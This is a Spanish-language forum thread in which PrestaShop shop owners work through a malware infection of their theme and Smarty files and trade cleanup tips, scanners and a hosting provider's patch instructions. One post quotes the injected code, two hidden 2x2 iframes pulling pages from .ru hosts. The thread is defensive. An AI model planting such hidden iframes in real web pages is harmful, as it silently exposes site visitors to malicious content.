themes/debug.tpl/index.php

 

en mi caso dentro de mi theme/footer.tpl/header.tpl/index.tpl

 

prestashop/footer.tpl/header.tpl/index.tpl

 

tools/index.php/smarty/debug.tpl/index.php/Smarty.class.php

 

No se te olvide forzar compilación, después de realizar el cambio.

 

Limpiar el historial reciente de tu navegador

 

creo que no me dejo ninguno

 

comentaros que al principio solo eliminaba de algunas carpetas y al rato de 3,4,5h estaba hay otra vez

 

me canse y revise carpeta por carpeta lo elimine todo y se acabo por el momento

 

un gran aporte por el compañero jordiob revisa tu web http://sitecheck.sucuri.net/scanner/

Edited by elitemfitness (see edit history)
  • Like 1
Link to comment
Share on other sites

lo e leido elite, entiendo con tu mensaje que aunque tu lo tengas en esos archivos pueden haver en mas sitios el codigo, por ellos pregunto si son todas las carpetas, porque me voy a poner a buscar y por ejemplo la carpeta de admin, seguramente no haga falta mirarla, aunque tampoco lo se...xD

Link to comment
Share on other sites

lirelok verifica carpeta por carpeta es mi consejo

bueno instale el modulo de twitter y a las 3 horas mas o menos se introdujo en pt bicho otra vez e disistalado el modulo twitter sigo en pruevas las colgare cuando las tenga ( si no conseguimos saver por donde entra sera imposible desacerse es esto)

un saludo

 

nadie te e pasado un privado necesitamos ayuda de profesionales de prestashop un saludo

Edited by elitemfitness (see edit history)
Link to comment
Share on other sites

Como lo llevais?

 

Yo de momento e localidazo codigo en todos estos archivos y todavia me queda un monton por mirar......

 

themes/debug.tpl/index.php

dentro de la carpeta theme/footer.tpl/header.tpl/index.tpl/index.php/restricted-country.tpl/maintenance.tpl

prestashop/footer.tpl/header.tpl/index.tpl/index.php/restricted-country.tpl/maintenance.tpl

tools/index.php/smarty/debug.tpl/index.php/Smarty.class.php

 

no hay algun soft para que busque el mismo codigo malware/malicioso? esto es una locura....

Link to comment
Share on other sites

Puede seguir los pasos que ponía aquí: http://jordiob.com/2012/07/como-resolver-los-ataques-de-malware-yo-virus-a-prestashop/ uno de ellos es instalar dreamweaver o eclipse y hacer un "nuevo sitio" que indexe todos los archivos de vuestro site. Dreamweaver tiene una función de buscar/reemplazar. Tenéis también otros editores como el Coda para Mac, el HTML Tidy, el Edit Plus... para gustos, colores :)

Link to comment
Share on other sites

Puede seguir los pasos que ponía aquí: http://jordiob.com/2...s-a-prestashop/ uno de ellos es instalar dreamweaver o eclipse y hacer un "nuevo sitio" que indexe todos los archivos de vuestro site. Dreamweaver tiene una función de buscar/reemplazar. Tenéis también otros editores como el Coda para Mac, el HTML Tidy, el Edit Plus... para gustos, colores :)

 

jordiob, mirando la piagina esta que enlazas que veo que es tuya, te pasa lo mismo que a mi!!

 

mira este enlace: http://www.prestasho...miento-erroneo/

 

No se si te has fijado, pero al abrir tu pagina mediante un dispositivo mobil aparece en la parte superior una barra buscador de BING, por fin veo a alguien que le pasa....ya creia que alguien me habia metio algun modulo que no veia...

 

Mirando tu script de la pagina veo que todavia tienes este codigo que es el que produce eso:

 

<iframe width="2" scrolling="auto" align="middle" height="2" frameborder="no" name="Twitter" src="http://greenpillar.ru/in.cgi?16">

 

En mi caso es este:

 

<iframe src="http://whitecada.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>

 

haber si entre todos conseguimos acabar con el!!!

 

Sobre lo que dice elitemfitness, supongo que puedes eliminar y instalar la web de nuevo, pero quien te dice que no nos va a pasar otra vez...

Edited by lirelok (see edit history)
Link to comment
Share on other sites

jordiob, mirando la piagina esta que enlazas que veo que es tuya, te pasa lo mismo que a mi!!

 

mira este enlace: http://www.prestasho...miento-erroneo/

 

No se si te has fijado, pero al abrir tu pagina mediante un dispositivo mobil aparece en la parte superior una barra buscador de BING, por fin veo a alguien que le pasa....ya creia que alguien me habia metio algun modulo que no veia...

 

Tienes razón, acabo de verlo, me metieron una inyección en el header (esto es wordpress, no prestashop). Resuelto, gracias!

Link to comment
Share on other sites

uff pues no sabes que alegria me dio de verlo y darme cuenta que era el virus, porque ya estaba por desinstalar todos los modulos....xDDD

 

Segui tu ayuda en la forma de buscar el codigo malicioso mediante dreamweaver, buscando archivos en el sitio local y es un lujazo!! y yo mirando archivo por archivo.....jajaja ahora e eliminado todo el codigo y la web esta totalmente limpia aunque en la paginahttp://sitecheck.sucuri.net/scanner/ todavia siguen saliendo los mismos problemas, supongo que tardan unos dias en limpiar su cache.

 

Pobre este otro sistema gratuito: http://safeweb.norton.com/ debes registrarte y realizar unos procesos para la autentificacion como propietario de la web, luego solicitas una revision de tu pagina y un plazo de 2, 3 dias te reportan un informe, el mio se realizo cuando la web ya estaba limpia: http://safeweb.norton.com/report/show?url=centralseeds.com

 

Asi que toca esperar y ver si el bichito vuelve a entrar.

Link to comment
Share on other sites

jejeje joer mas grande y me come...xDD

 

Pues ahora si, sale todo limpio, lo unico que me sale es esto:

 

warn: Plesk version 10 outdated: Upgrade required.

 

Asi que esto es que la version de plesk que tiene mi hosting no esta actualizado, no? esque los de loading me dijeron que si estaba todo actualizado...hay otra manera de comprobar la version de plesk de mi hosting por mi cuenta? entrando en el panel no veo ningun sitio donde me diga la version.

Link to comment
Share on other sites

Asi que esto es que la version de plesk que tiene mi hosting no esta actualizado, no? esque los de loading me dijeron que si estaba todo actualizado...hay otra manera de comprobar la version de plesk de mi hosting por mi cuenta? entrando en el panel no veo ningun sitio donde me diga la version.

 

Si te dice esto, es que está desactualizado, fijo :)

  • Like 1
Link to comment
Share on other sites

no te preocupes nadie que disponen de un buen servicio atencion al cliente, y contestan rapido...xD

 

Ahora ya me explicaron bien el porque:

 

Ha salido hace poco una versión de Plesk, la cual no pretendemos actualizar debido a que podría causar problemas en nuestros clientes, la versión que tiene usted es la actual hasta hoy, la cual está parcheada con parches oficiales de Plesk y también con unos parches nuestros para evitar conexiones remotas a nuestros servidores de IP que no sean las nuestras

 

Asi que el tema en pricipio esta resuelto.

Edited by lirelok (see edit history)
Link to comment
Share on other sites

no te preocupes nadie que disponen de un buen servicio atencion al cliente, y contestan rapido...xD

 

Ahora ya me explicaron bien el porque:

 

 

 

Asi que el tema en pricipio esta resuelto.[/color][/color][/color]

De todos modos les envié un privado.

  • Like 1
Link to comment
Share on other sites

Buenas a todos,

 

Es cierto que utilizamos Plesk 10, pero este ha sido blindado con todos los parches de seguridad oficiales que han ido saliendo al descubrirse alguna vulnerabilidad. A parte de estos, hemos creado nosotros mismos un parche para salvaguardar todavía más a nuestros clientes que no permite conexiones remotas de IPs que no sean de Loading lo que evita que los hackers puedan acceder a Plesk para causar daños.

 

Además de todo esto y con respecto a Prestashop, hemos aplicado de forma totalmente gratuita a todos nuestros clientes que utilizan esta aplicación el parche que salió en su día debido a una vulnerabilidad de esta herramienta. Lo publicamos en nuestro blog hace unos días: http://www.loading.es/blog/

 

Un saludo a todos.

  • Like 1
Link to comment
Share on other sites

Además de todo esto y con respecto a Prestashop, hemos aplicado de forma totalmente gratuita a todos nuestros clientes que utilizan esta aplicación el parche que salió en su día debido a una vulnerabilidad de esta herramienta.

 

elitemfitness, por el escrito se supone que todos los clientes de loading con prestashop lo tienen puesto ya.

Edited by lirelok (see edit history)
Link to comment
Share on other sites

Buenas a todos,

 

Es cierto que utilizamos Plesk 10, pero este ha sido blindado con todos los parches de seguridad oficiales que han ido saliendo al descubrirse alguna vulnerabilidad. A parte de estos, hemos creado nosotros mismos un parche para salvaguardar todavía más a nuestros clientes que no permite conexiones remotas de IPs que no sean de Loading lo que evita que los hackers puedan acceder a Plesk para causar daños.

 

Además de todo esto y con respecto a Prestashop, hemos aplicado de forma totalmente gratuita a todos nuestros clientes que utilizan esta aplicación el parche que salió en su día debido a una vulnerabilidad de esta herramienta. Lo publicamos en nuestro blog hace unos días: http://www.loading.es/blog/

 

Un saludo a todos.

 

Hola Loadinges e descargado su parche este donde se tiene que meter?

gracias por toda su ayuda

Link to comment
Share on other sites

Hola elitemfitness,

 

Tienes que subir el archivo herfix.php a la raíz donde tengas instalado Prestashop (donde se encuentran los archivos index.php, 404.php, etc.) y ejecutarlo vía web. El parche se aplica y se elimina automáticamente.

 

Un saludo

Link to comment
Share on other sites

Hola elitemfitness,

 

Tienes que subir el archivo herfix.php a la raíz donde tengas instalado Prestashop (donde se encuentran los archivos index.php, 404.php, etc.) y ejecutarlo vía web. El parche se aplica y se elimina automáticamente.

 

Un saludo

 

ok lo que no entiendo como lo ejecuto via web

soy cliente buestro y sinceramente sois los unicos que ayudais con esto me pensare y casi seguro que viendo como trabajais traspasare unos 60 dominios que tengo alojados en otras empresas

gracias

Edited by elitemfitness (see edit history)
Link to comment
Share on other sites

ok lo que no entiendo como lo ejecuto via web

soy cliente buestro y sinceramente sois los unicos que ayudais con esto me pensare y casi seguro que viendo como trabajais traspasare unos 60 dominios que tengo alojados en otras empresas

gracias

 

Pones en el navegador la dirección de tu tienda más /herfix.php

Ejemplos:

www.mitienda.es/herfix.php

www.mitienda.es/prestashop/herfix.php

 

Tienes cualquiera de las versiones de Prestashop que pone en el blog, no?

Link to comment
Share on other sites

Hola elitemfitness,

 

Tienes que subir el archivo herfix.php a la raíz donde tengas instalado Prestashop (donde se encuentran los archivos index.php, 404.php, etc.) y ejecutarlo vía web. El parche se aplica y se elimina automáticamente.

 

Un saludo

 

ok lo entendi gracias

Versión de PrestaShop: 1.4.8.2

Link to comment
Share on other sites

Hola lirelok puedes ayudarme paso a paso como usar esto Dreamweaver y buscar el codigo para su limpieza gracias

 

elitemfitness debes abrir dreamweaver e ir a sitio, luego nuevo sitio, luego le pones el nombre que quieras y seleccionas donde tienes toda la web en tu pc, guardas y ahora dreamweaver te indexa toda la web, cuando finaliza te vas a edicion y buscar y remplazar, una vez se te habre la ventana de buscar, en la parte superior elige la opcion sitio local, el siguiente lo dejas en la opcion texto y luego solo tienes que poner las palabras que quieres buscar, que son las que contienen el codigo malicioso, y ya con eso solo queda buscar,borrar,guardar asi hasta que no salga codigo malignoOo.

 

Sobre lo que decir de la version de prestashop si vale de algo yo tengo PrestaShop™ 1.4.7.3

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...